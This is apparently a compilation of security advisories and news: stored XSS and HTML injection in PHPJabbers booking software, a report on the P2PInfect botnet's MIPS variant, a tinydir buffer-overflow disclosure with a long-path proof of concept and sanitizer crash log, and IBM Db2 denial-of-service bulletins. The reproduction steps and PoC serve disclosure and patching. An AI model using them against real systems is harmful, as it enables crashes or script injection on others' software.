PHPJabbers Time Slots Booking Calendar version 4.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 -Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48828Descriptions:Multiple Stored Cross-Site Scripting (XSS) is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server. Unlike reflected XSS, where themalicious script is embedded in a URL and executed immediately, storedXSS involves the persistent storage of the malicious script on thetarget server, waiting for unsuspecting users to access thecompromised content.Steps to Reproduce:1. Login your panel2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48828)

PHPJabbers Time Slots Booking Calendar 4.0 Cross Site Scripting

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from an html injection vulnerability.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48827Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. "name, plugin_sms_api_key, plugin_sms_country_code, calendar_id,title, country name, customer_name" parameters are vulnerable to htmlinjection.3. Go to System Menu then click SMS Settings.4. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.5. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48827)

PHPJabbers Time Slots Booking Calendar 4.0 HTML Injection

Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices.
The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach.
"It's highly likely that by targeting MIPS, the P2PInfect developers

Cybersecurity researchers have discovered a new variant of an emerging botnet called **P2PInfect** that's capable of targeting routers and IoT devices.

The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach.

"It's highly likely that by targeting MIPS, the P2PInfect developers intend to infect routers and IoT devices with the malware," security researcher Matt Muir said in a report shared with The Hacker News.

P2PInfect, a Rust-based malware, was first disclosed back in July 2023, targeting unpatched Redis instances by exploiting a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) for initial access.

UPCOMING WEBINAR

Learn Insider Threat Detection with Application Response Strategies

Discover how application detection, response, and automated behavior modeling can revolutionize your defense against insider threats.

Join Now

A subsequent analysis from the cloud security firm in September revealed a surge in P2PInfect activity, coinciding with the release of iterative variants of the malware.

The new artifacts, besides attempting to conduct SSH brute-force attacks on devices embedded with 32-bit MIPS processors, packs in updated evasion and anti-analysis techniques to fly under the radar.

The brute-force attempts against SSH servers identified during the scanning phase are carried out using common username and password pairs present within the ELF binary itself.

It's suspected that both SSH and Redis servers are propagation vectors for the MIPS variant owing to the fact that it's possible to run a Redis server on MIPS using an OpenWrt package known as redis-server.

One of the notable evasion methods used is a check to determine if it's being analyzed and, if so, terminate itself, as well as an attempt to disable Linux core dumps, which are files automatically generated by the kernel after a process crashes unexpectedly.

The MIPS variant also includes an embedded 64-bit Windows DLL module for Redis that allows for the execution of shell commands on a compromised system.

"Not only is this an interesting development in that it demonstrates a widening of scope for the developers behind P2PInfect (more supported processor architectures equals more nodes in the botnet itself), but the MIPS32 sample includes some notable defense evasion techniques," Cado said.

"This, combined with the malware's utilization of Rust (aiding cross-platform development) and rapid growth of the botnet itself, reinforces previous suggestions that this campaign is being conducted by a sophisticated threat actor."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices

TinyDir is a lightweight C directory and file reader. Buffer overflows in the `tinydir_file_open()` function. This vulnerability has been patched in version 1.2.6.

**Affected versions**

<= 1.2.5 (latest)

**Summary**

I spotted some buffer overflow vulnerabilities at the following locations in the tinydir source code:  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L675-L680  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L706  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L711

**Details**

Buffer overflows in the tinydir_file_open() function, see marked lines below:

/\* Open a single file given its path \*/
\_TINYDIR\_FUNC
int tinydir\_file\_open(tinydir\_file \*file, const \_tinydir\_char\_t \*path)
{
	tinydir\_dir dir;
	int result \= 0;
	int found \= 0;
	\_tinydir\_char\_t dir\_name\_buf\[\_TINYDIR\_PATH\_MAX\];
	\_tinydir\_char\_t file\_name\_buf\[\_TINYDIR\_FILENAME\_MAX\];
	\_tinydir\_char\_t \*dir\_name;
	\_tinydir\_char\_t \*base\_name;
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
	\_tinydir\_char\_t drive\_buf\[\_TINYDIR\_PATH\_MAX\];
	\_tinydir\_char\_t ext\_buf\[\_TINYDIR\_FILENAME\_MAX\];
#endif

	if (file \== NULL || path \== NULL || \_tinydir\_strlen(path) \== 0)
	{
		errno \= EINVAL;
		return \-1;
	}
	if (\_tinydir\_strlen(path) + \_TINYDIR\_PATH\_EXTRA >= \_TINYDIR\_PATH\_MAX)
	{
		errno \= ENAMETOOLONG;
		return \-1;
	}

	/\* Get the parent path \*/
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
#if ((defined \_MSC\_VER) && (\_MSC\_VER >= 1400))
	errno \= \_tsplitpath\_s(
		path,
		drive\_buf, \_TINYDIR\_DRIVE\_MAX,
		dir\_name\_buf, \_TINYDIR\_FILENAME\_MAX,
		file\_name\_buf, \_TINYDIR\_FILENAME\_MAX,
		ext\_buf, \_TINYDIR\_FILENAME\_MAX);
#else
	\_tsplitpath(
		path,
		drive\_buf,
		dir\_name\_buf,
		file\_name\_buf,
		ext\_buf); // VULN: potential buffer overflow due to insecure splitpath api (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170)
#endif

	if (errno)
	{
		return \-1;
	}

/\* \_splitpath\_s not work fine with only filename and widechar support \*/
#ifdef \_UNICODE
	if (drive\_buf\[0\] \== L'\\xFEFE')
		drive\_buf\[0\] \= '\\0';
	if (dir\_name\_buf\[0\] \== L'\\xFEFE')
		dir\_name\_buf\[0\] \= '\\0';
#endif

	/\* Emulate the behavior of dirname by returning "." for dir name if it's
	empty \*/
	if (drive\_buf\[0\] \== '\\0' && dir\_name\_buf\[0\] \== '\\0')
	{
		\_tinydir\_strcpy(dir\_name\_buf, TINYDIR\_STRING("."));
	}
	/\* Concatenate the drive letter and dir name to form full dir name \*/
	\_tinydir\_strcat(drive\_buf, dir\_name\_buf);
	dir\_name \= drive\_buf;
	/\* Concatenate the file name and extension to form base name \*/
	\_tinydir\_strcat(file\_name\_buf, ext\_buf); // VULN: since sizeof(file\_name\_buf) + sizeof(ext\_buf) is larger than sizeof(file\_name\_buf), we have a potential stack buffer overflow
	base\_name \= file\_name\_buf;
#else
	\_tinydir\_strcpy(dir\_name\_buf, path);
	dir\_name \= dirname(dir\_name\_buf);
	\_tinydir\_strcpy(file\_name\_buf, path); // VULN: since sizeof(file\_name\_buf) is smaller than the maximum path length, we have a potential stack buffer overflow
	base\_name \= basename(file\_name\_buf);
#endif

	/\* Special case: if the path is a root dir, open the parent dir as the file \*/
#if (defined \_MSC\_VER || defined \_\_MINGW32\_\_)
	if (\_tinydir\_strlen(base\_name) \== 0)
#else
	if ((\_tinydir\_strcmp(base\_name, TINYDIR\_STRING("/"))) \== 0)
#endif
	{
		memset(file, 0, sizeof \* file);
		file\->is\_dir \= 1;
		file\->is\_reg \= 0;
		\_tinydir\_strcpy(file\->path, dir\_name);
		file\->extension \= file\->path + \_tinydir\_strlen(file\->path);
		return 0;
	}

	/\* Open the parent directory \*/
	if (tinydir\_open(&dir, dir\_name) \== \-1)
	{
		return \-1;
	}

	/\* Read through the parent directory and look for the file \*/
	while (dir.has\_next)
	{
		if (tinydir\_readfile(&dir, file) \== \-1)
		{
			result \= \-1;
			goto bail;
		}
		if (\_tinydir\_strcmp(file\->name, base\_name) \== 0)
		{
			/\* File found \*/
			found \= 1;
			break;
		}
		tinydir\_next(&dir);
	}
	if (!found)
	{
		result \= \-1;
		errno \= ENOENT;
	}

bail:
	tinydir\_close(&dir);
	return result;
}

**PoC**

Step-by-step instructions to replicate the third vulnerability that's present at this location:  
https://github.com/cxong/tinydir/blob/master/tinydir.h#L711

    $ git clone https://github.com/cxong/tinydir
    $ cd tinydir/samples/
    $ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample
    $ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
    $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Extension: 
    Is dir? yes
    Is regular file? no
    $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
    =================================================================
    ==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8
    WRITE of size 513 at 0x7ffd1ecabeb0 thread T0
        #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440
        #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711
        #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12
        #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)
    
    Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame
        #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641
    
      This frame has 3 object(s):
        [48, 4184) 'dir' (line 642)
        [4448, 4704) 'file_name_buf' (line 646)
        [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy
    Shadow bytes around the buggy address:
      0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
      0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00
      0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2533==ABORTING
    

The other two vulnerabilities are Windows-specific. It should be possible to replicate them by crafting long paths in a similar way.

**Impact**

If the input above crosses a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

CVE-2023-49287: Buffer overflow vulnerabilities in tinydir

IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted RUNSTATS command on an 8TB table.  IBM X-Force ID:  264809.

  

**Summary**

IBM® Db2® is vulnerable to denial of service with a specially crafted RUNSTATS command on an 8TB or larger table.

**Vulnerability Details**

**CVEID:**   CVE-2023-40687  
**DESCRIPTION:**   IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to denial of service with a specially crafted RUNSTATS command on an 8TB table.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/264809 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

10.5.0.11

Server

IBM® Db2®

11.1.4.7

Server

IBM® Db2®

11.5.x

Server

All platforms are affected.  
Earlier releases (10.1, 9.7 etc.) may also be affected, but they are no longer supported. 

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP7, and V11.5.9. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

DT211674

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.1

TBD

DT211674

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT211674

Special Build for V11.5.0:

AIX 64-bit (for OS7.1)

  
Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

  
V11.5.9:  
https://www.ibm.com/support/pages/node/7071342

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5, 11.1, 10.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-40687: IBM® Db2® is vulnerable to denial of service with a specially crafted RUNSTATS command. (CVE-2023-40687)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted SQL statement.  IBM X-Force ID:  262257.

  

**Summary**

IBM® Db2® is vulnerable to denial of service with a specially crafted SQL statement.

**Vulnerability Details**

**CVEID:**   CVE-2023-38727  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to denial of service with a specially crafted SQL statement.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/262257 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

10.5.0.11

Server

IBM® Db2®

11.1.4.7

Server

IBM® Db2®

11.5.x

Server

All platforms are affected.  
Earlier releases (10.1, 9.7 etc.) may also be affected, but they are no longer supported. 

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP7, and V11.5.9. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

DT222859

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.1

TBD

DT222859

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT222859

Special Build for V11.5.0:

AIX 64-bit (for OS7.1)

  
Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

  
V11.5.9:  
https://www.ibm.com/support/pages/node/7071342

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"11.5, 11.1, 10.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-38727: IBM® Db2® is vulnerable to denial of service with a specially crafted SQL statement. (CVE-2023-38727)

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1, and 11.5 is vulnerable to a denial of service through a specially crafted federated query on specific federation objects.  IBM X-Force ID:  252048.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service through a specially crafted federated query on specific federation objects.

**Vulnerability Details**

**CVEID:**   CVE-2023-29258  
**DESCRIPTION:**   IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service through a specially crafted federated query on specific federation objects.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252048 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Applicable Editions

IBM® Db2®

11.1.4.x

Server

IBM® Db2®

11.5.x

Server

All platforms are affected.  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V11.1.4 FP7, and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.1

TBD

DT198104

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT198104

Special Build for V11.5.0:

AIX 64-bit (for OS7.1)

  
Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

  
V11.5.9:  
https://www.ibm.com/support/pages/node/7071342

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

01 Dec 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

